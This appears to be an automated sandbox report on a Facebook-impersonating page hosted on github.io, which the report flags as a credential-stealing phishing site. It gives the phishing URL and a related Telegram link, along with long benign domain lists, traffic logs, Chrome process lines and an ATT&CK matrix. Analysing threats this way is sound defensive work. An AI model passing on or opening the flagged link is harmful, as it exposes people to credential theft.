Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mighty-app.appspot.com
Source: sets.json.0.dr	String found in binary or memory: https://mightytext.net
Source: sets.json.0.dr	String found in binary or memory: https://mittanbud.no
Source: sets.json.0.dr	String found in binary or memory: https://money.pl
Source: sets.json.0.dr	String found in binary or memory: https://motherandbaby.com
Source: sets.json.0.dr	String found in binary or memory: https://mystudentdashboard.com
Source: sets.json.0.dr	String found in binary or memory: https://nacion.com
Source: sets.json.0.dr	String found in binary or memory: https://naukri.com
Source: sets.json.0.dr	String found in binary or memory: https://nidhiacademyonline.com
Source: sets.json.0.dr	String found in binary or memory: https://nien.co
Source: sets.json.0.dr	String found in binary or memory: https://nien.com
Source: sets.json.0.dr	String found in binary or memory: https://nien.org
Source: sets.json.0.dr	String found in binary or memory: https://nlc.hu
Source: sets.json.0.dr	String found in binary or memory: https://nosalty.hu
Source: sets.json.0.dr	String found in binary or memory: https://noticiascaracol.com
Source: sets.json.0.dr	String found in binary or memory: https://nourishingpursuits.com
Source: sets.json.0.dr	String found in binary or memory: https://nvidia.com
Source: sets.json.0.dr	String found in binary or memory: https://o2.pl
Source: sets.json.0.dr	String found in binary or memory: https://ocdn.eu
Source: sets.json.0.dr	String found in binary or memory: https://onet.pl
Source: sets.json.0.dr	String found in binary or memory: https://ottplay.com
Source: sets.json.0.dr	String found in binary or memory: https://p106.net
Source: sets.json.0.dr	String found in binary or memory: https://p24.hu
Source: sets.json.0.dr	String found in binary or memory: https://paula.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://pdmp-apis.no
Source: sets.json.0.dr	String found in binary or memory: https://phonandroid.com
Source: sets.json.0.dr	String found in binary or memory: https://player.pl
Source: sets.json.0.dr	String found in binary or memory: https://plejada.pl
Source: sets.json.0.dr	String found in binary or memory: https://poalim.site
Source: sets.json.0.dr	String found in binary or memory: https://poalim.xyz
Source: sets.json.0.dr	String found in binary or memory: https://pomponik.pl
Source: sets.json.0.dr	String found in binary or memory: https://portalinmobiliario.com
Source: sets.json.0.dr	String found in binary or memory: https://prisjakt.no
Source: sets.json.0.dr	String found in binary or memory: https://pudelek.pl
Source: sets.json.0.dr	String found in binary or memory: https://punjabijagran.com
Source: sets.json.0.dr	String found in binary or memory: https://radio1.be
Source: sets.json.0.dr	String found in binary or memory: https://radio2.be
Source: sets.json.0.dr	String found in binary or memory: https://reactor.cc
Source: sets.json.0.dr	String found in binary or memory: https://repid.org
Source: sets.json.0.dr	String found in binary or memory: https://reshim.org
Source: sets.json.0.dr	String found in binary or memory: https://rws1nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://rws2nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://rws3nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://sackrace.ai
Source: sets.json.0.dr	String found in binary or memory: https://salemoveadvisor.com
Source: sets.json.0.dr	String found in binary or memory: https://salemovefinancial.com
Source: sets.json.0.dr	String found in binary or memory: https://salemovetravel.com
Source: sets.json.0.dr	String found in binary or memory: https://samayam.com
Source: sets.json.0.dr	String found in binary or memory: https://sapo.io
Source: sets.json.0.dr	String found in binary or memory: https://sapo.pt
Source: sets.json.0.dr	String found in binary or memory: https://shock.co
Source: sets.json.0.dr	String found in binary or memory: https://smaker.pl
Source: sets.json.0.dr	String found in binary or memory: https://smoney.vn
Source: sets.json.0.dr	String found in binary or memory: https://smpn106jkt.sch.id
Source: sets.json.0.dr	String found in binary or memory: https://socket-to-me.vip
Source: sets.json.0.dr	String found in binary or memory: https://songshare.com
Source: sets.json.0.dr	String found in binary or memory: https://songstats.com
Source: sets.json.0.dr	String found in binary or memory: https://sporza.be
Source: sets.json.0.dr	String found in binary or memory: https://standardsandpraiserepurpose.com
Source: sets.json.0.dr	String found in binary or memory: https://startlap.hu
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.com
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.net
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.org
Source: sets.json.0.dr	String found in binary or memory: https://stripe.com
Source: sets.json.0.dr	String found in binary or memory: https://stripe.network
Source: sets.json.0.dr	String found in binary or memory: https://stripecdn.com
Source: sets.json.0.dr	String found in binary or memory: https://supereva.it
Source: chromecache_116.1.dr	String found in binary or memory: https://t.me/assets_tnzxo/3
Source: sets.json.0.dr	String found in binary or memory: https://takeabreak.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://talkdeskqaid.com
Source: sets.json.0.dr	String found in binary or memory: https://talkdeskstgid.com
Source: sets.json.0.dr	String found in binary or memory: https://teacherdashboard.com
Source: sets.json.0.dr	String found in binary or memory: https://technology-revealed.com
Source: sets.json.0.dr	String found in binary or memory: https://terazgotuje.pl
Source: sets.json.0.dr	String found in binary or memory: https://text.com
Source: sets.json.0.dr	String found in binary or memory: https://textyserver.appspot.com
Source: sets.json.0.dr	String found in binary or memory: https://the42.ie
Source: sets.json.0.dr	String found in binary or memory: https://thejournal.ie
Source: sets.json.0.dr	String found in binary or memory: https://thirdspace.org.au
Source: sets.json.0.dr	String found in binary or memory: https://timesinternet.in
Source: sets.json.0.dr	String found in binary or memory: https://timesofindia.com
Source: sets.json.0.dr	String found in binary or memory: https://tolteck.app
Source: sets.json.0.dr	String found in binary or memory: https://tolteck.com
Source: sets.json.0.dr	String found in binary or memory: https://top.pl
Source: sets.json.0.dr	String found in binary or memory: https://tribunnews.com
Source: sets.json.0.dr	String found in binary or memory: https://trytalkdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com.co
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://tvid.in
Source: sets.json.0.dr	String found in binary or memory: https://tvn.pl
Source: sets.json.0.dr	String found in binary or memory: https://tvn24.pl
Source: sets.json.0.dr	String found in binary or memory: https://unotv.com
Source: sets.json.0.dr	String found in binary or memory: https://victorymedium.com
Source: sets.json.0.dr	String found in binary or memory: https://vrt.be
Source: sets.json.0.dr	String found in binary or memory: https://vwo.com
Source: sets.json.0.dr	String found in binary or memory: https://welt.de
Source: sets.json.0.dr	String found in binary or memory: https://wieistmeineip.de
Source: sets.json.0.dr	String found in binary or memory: https://wildix.com
Source: sets.json.0.dr	String found in binary or memory: https://wildixin.com
Source: sets.json.0.dr	String found in binary or memory: https://wingify.com
Source: sets.json.0.dr	String found in binary or memory: https://wordle.at
Source: sets.json.0.dr	String found in binary or memory: https://wp.pl
Source: sets.json.0.dr	String found in binary or memory: https://wpext.pl
Source: sets.json.0.dr	String found in binary or memory: https://www.asadcdn.com
Source: chromecache_116.1.dr	String found in binary or memory: https://www.google.com/maps/search/?api=1&query=$
Source: sets.json.0.dr	String found in binary or memory: https://ya.ru
Source: sets.json.0.dr	String found in binary or memory: https://yours.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://zalo.me
Source: sets.json.0.dr	String found in binary or memory: https://zdrowietvn.pl
Source: sets.json.0.dr	String found in binary or memory: https://zingmp3.vn

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 54351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54353
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54351
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:54351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:54352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:54353 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\manifest.fingerprint	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_5964_24671035

Jump to behavior

Source: classification engine

Classification label: mal88.phis.win@27/20@8/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://omar-tnzxoo.github.io/facebook-mobile/index.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5424 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5424 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://omar-tnzxoo.github.io/facebook-mobile/index.html	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Source	Detection	Scanner	Label
https://wieistmeineip.de	0%	URL Reputation	safe
https://mercadoshops.com.co	0%	URL Reputation	safe
https://gliadomain.com	0%	URL Reputation	safe
https://poalim.xyz	0%	URL Reputation	safe
https://mercadolivre.com	0%	URL Reputation	safe
https://reshim.org	0%	URL Reputation	safe
https://nourishingpursuits.com	0%	URL Reputation	safe
https://medonet.pl	0%	URL Reputation	safe
https://unotv.com	0%	URL Reputation	safe
https://mercadoshops.com.br	0%	URL Reputation	safe
https://zdrowietvn.pl	0%	URL Reputation	safe
https://johndeere.com	0%	URL Reputation	safe
https://songstats.com	0%	URL Reputation	safe
https://baomoi.com	0%	URL Reputation	safe
https://supereva.it	0%	URL Reputation	safe
https://elfinancierocr.com	0%	URL Reputation	safe
https://bolasport.com	0%	URL Reputation	safe
https://rws1nvtvt.com	0%	URL Reputation	safe
https://desimartini.com	0%	URL Reputation	safe
https://hearty.app	0%	URL Reputation	safe
https://hearty.gift	0%	URL Reputation	safe
https://mercadoshops.com	0%	URL Reputation	safe
https://heartymail.com	0%	URL Reputation	safe
https://p106.net	0%	URL Reputation	safe
https://radio2.be	0%	URL Reputation	safe
https://finn.no	0%	URL Reputation	safe
https://hc1.com	0%	URL Reputation	safe
https://kompas.tv	0%	URL Reputation	safe
https://mystudentdashboard.com	0%	URL Reputation	safe
https://songshare.com	0%	URL Reputation	safe
https://smaker.pl	0%	URL Reputation	safe
https://mercadopago.com.mx	0%	URL Reputation	safe
https://p24.hu	0%	URL Reputation	safe
https://talkdeskqaid.com	0%	URL Reputation	safe
https://mercadopago.com.pe	0%	URL Reputation	safe
https://cardsayings.net	0%	URL Reputation	safe
https://text.com	0%	URL Reputation	safe
https://mightytext.net	0%	URL Reputation	safe
https://pudelek.pl	0%	URL Reputation	safe
https://hazipatika.com	0%	URL Reputation	safe
https://joyreactor.com	0%	URL Reputation	safe
https://cookreactor.com	0%	URL Reputation	safe
https://wildixin.com	0%	URL Reputation	safe
https://eworkbookcloud.com	0%	URL Reputation	safe
https://cognitiveai.ru	0%	URL Reputation	safe
https://nacion.com	0%	URL Reputation	safe
https://chennien.com	0%	URL Reputation	safe
https://drimer.travel	0%	URL Reputation	safe
https://deccoria.pl	0%	URL Reputation	safe
https://mercadopago.cl	0%	URL Reputation	safe
https://talkdeskstgid.com	0%	URL Reputation	safe
https://bonvivir.com	0%	URL Reputation	safe
https://carcostadvisor.be	0%	URL Reputation	safe
https://salemovetravel.com	0%	URL Reputation	safe
https://sapo.io	0%	URL Reputation	safe
https://wpext.pl	0%	URL Reputation	safe
https://welt.de	0%	URL Reputation	safe
https://poalim.site	0%	URL Reputation	safe
https://drimer.io	0%	URL Reputation	safe
https://infoedgeindia.com	0%	URL Reputation	safe
https://blackrockadvisorelite.it	0%	URL Reputation	safe
https://cognitive-ai.ru	0%	URL Reputation	safe
https://cafemedia.com	0%	URL Reputation	safe
https://graziadaily.co.uk	0%	URL Reputation	safe
https://thirdspace.org.au	0%	URL Reputation	safe
https://mercadoshops.com.ar	0%	URL Reputation	safe
https://smpn106jkt.sch.id	0%	URL Reputation	safe
https://elpais.uy	0%	URL Reputation	safe
https://landyrev.com	0%	URL Reputation	safe
https://the42.ie	0%	URL Reputation	safe
https://commentcamarche.com	0%	URL Reputation	safe
https://tucarro.com.ve	0%	URL Reputation	safe
https://rws3nvtvt.com	0%	URL Reputation	safe
https://eleconomista.net	0%	URL Reputation	safe
https://helpdesk.com	0%	URL Reputation	safe
https://mercadolivre.com.br	0%	URL Reputation	safe
https://clmbtech.com	0%	URL Reputation	safe
https://standardsandpraiserepurpose.com	0%	URL Reputation	safe
https://salemovefinancial.com	0%	URL Reputation	safe
https://mercadopago.com.br	0%	URL Reputation	safe
https://commentcamarche.net	0%	URL Reputation	safe
https://etfacademy.it	0%	URL Reputation	safe
https://mighty-app.appspot.com	0%	URL Reputation	safe
https://hj.rs	0%	URL Reputation	safe
https://hearty.me	0%	URL Reputation	safe
https://mercadolibre.com.gt	0%	URL Reputation	safe
https://timesinternet.in	0%	URL Reputation	safe
https://indiatodayne.in	0%	URL Reputation	safe
https://idbs-staging.com	0%	URL Reputation	safe
https://blackrock.com	0%	URL Reputation	safe
https://idbs-eworkbook.com	0%	URL Reputation	safe
https://motherandbaby.com	0%	URL Reputation	safe
https://mercadolibre.co.cr	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
omar-tnzxoo.github.io	185.199.109.153	true	true	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
www.google.com	142.250.185.132	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
198.187.3.20.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://omar-tnzxoo.github.io/facebook-mobile/assets/icon.png	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wieistmeineip.de	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com.co	sets.json.0.dr	false	URL Reputation: safe	unknown
https://gliadomain.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://poalim.xyz	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadolivre.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://reshim.org	sets.json.0.dr	false	URL Reputation: safe	unknown
https://nourishingpursuits.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://medonet.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://unotv.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com.br	sets.json.0.dr	false	URL Reputation: safe	unknown
https://joyreactor.cc	sets.json.0.dr	false		unknown
https://zdrowietvn.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://johndeere.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://songstats.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://baomoi.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://supereva.it	sets.json.0.dr	false	URL Reputation: safe	unknown
https://elfinancierocr.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://bolasport.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://rws1nvtvt.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://desimartini.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hearty.app	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hearty.gift	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://heartymail.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://nlc.hu	sets.json.0.dr	false		unknown
https://p106.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://radio2.be	sets.json.0.dr	false	URL Reputation: safe	unknown
https://finn.no	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hc1.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://kompas.tv	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mystudentdashboard.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://songshare.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://smaker.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadopago.com.mx	sets.json.0.dr	false	URL Reputation: safe	unknown
https://p24.hu	sets.json.0.dr	false	URL Reputation: safe	unknown
https://talkdeskqaid.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://24.hu	sets.json.0.dr	false		unknown
https://mercadopago.com.pe	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cardsayings.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://text.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mightytext.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://pudelek.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hazipatika.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://joyreactor.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cookreactor.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://wildixin.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://eworkbookcloud.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cognitiveai.ru	sets.json.0.dr	false	URL Reputation: safe	unknown
https://nacion.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://chennien.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://drimer.travel	sets.json.0.dr	false	URL Reputation: safe	unknown
https://deccoria.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadopago.cl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://talkdeskstgid.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://naukri.com	sets.json.0.dr	false		unknown
https://interia.pl	sets.json.0.dr	false		unknown
https://bonvivir.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://carcostadvisor.be	sets.json.0.dr	false	URL Reputation: safe	unknown
https://salemovetravel.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://sapo.io	sets.json.0.dr	false	URL Reputation: safe	unknown
https://wpext.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://welt.de	sets.json.0.dr	false	URL Reputation: safe	unknown
https://poalim.site	sets.json.0.dr	false	URL Reputation: safe	unknown
https://drimer.io	sets.json.0.dr	false	URL Reputation: safe	unknown
https://infoedgeindia.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://blackrockadvisorelite.it	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cognitive-ai.ru	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cafemedia.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://graziadaily.co.uk	sets.json.0.dr	false	URL Reputation: safe	unknown
https://thirdspace.org.au	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com.ar	sets.json.0.dr	false	URL Reputation: safe	unknown
https://smpn106jkt.sch.id	sets.json.0.dr	false	URL Reputation: safe	unknown
https://elpais.uy	sets.json.0.dr	false	URL Reputation: safe	unknown
https://landyrev.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://the42.ie	sets.json.0.dr	false	URL Reputation: safe	unknown
https://commentcamarche.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://tucarro.com.ve	sets.json.0.dr	false	URL Reputation: safe	unknown
https://rws3nvtvt.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://eleconomista.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://helpdesk.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadolivre.com.br	sets.json.0.dr	false	URL Reputation: safe	unknown
https://clmbtech.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://standardsandpraiserepurpose.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://07c225f3.online	sets.json.0.dr	false		unknown
https://salemovefinancial.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadopago.com.br	sets.json.0.dr	false	URL Reputation: safe	unknown
https://commentcamarche.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://etfacademy.it	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mighty-app.appspot.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hj.rs	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hearty.me	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadolibre.com.gt	sets.json.0.dr	false	URL Reputation: safe	unknown
https://timesinternet.in	sets.json.0.dr	false	URL Reputation: safe	unknown
https://indiatodayne.in	sets.json.0.dr	false	URL Reputation: safe	unknown
https://idbs-staging.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://blackrock.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://idbs-eworkbook.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://motherandbaby.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadolibre.co.cr	sets.json.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
